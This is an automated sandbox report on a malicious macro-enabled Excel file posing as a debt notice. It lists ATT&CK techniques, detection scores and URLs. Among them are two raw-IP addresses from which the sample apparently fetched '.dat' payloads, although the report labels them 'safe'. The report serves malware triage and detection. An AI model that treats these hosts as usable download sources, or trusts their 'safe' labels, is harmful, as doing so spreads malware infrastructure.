Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting32LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Outstanding-Debt-71778964-05042021.xlsm2%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
http://5.34.179.36/44313,6048108796.dat0%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
http://91.211.91.81/44313,6048108796.dat0%Avira URL Cloudsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://5.34.179.36/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown
http://91.211.91.81/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
    high
    https://login.microsoftonline.com/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
      high
      https://shell.suite.office.com:1443D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
          high
          https://autodiscover-s.outlook.com/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
              high
              https://cdn.entity.D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                    high
                    https://powerlift.acompli.netD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                      high
                      https://cortana.aiD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                high
                                https://api.aadrm.com/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                      high
                                      https://cr.office.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                            high
                                            https://graph.ppe.windows.netD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                            high
                                                            https://graph.windows.netD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                high
                                                                                                https://api.office.netD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesD47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                91.211.91.81
                                                                                                                                                unknownUkraine
                                                                                                                                                206638HOSTFORYUAfalse
                                                                                                                                                5.34.179.36
                                                                                                                                                unknownUkraine
                                                                                                                                                204957GREENFLOID-ASUAfalse
                                                                                                                                                45.153.229.23
                                                                                                                                                unknownRussian Federation
                                                                                                                                                25229VOLIA-ASUAfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:404155
                                                                                                                                                Start date:04.05.2021
                                                                                                                                                Start time:19:04:16
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 5m 3s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Outstanding-Debt-71778964-05042021.xlsm
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:24
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • GSI enabled (VBA)
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal60.expl.evad.winXLSM@1/10@0/3
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsm
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
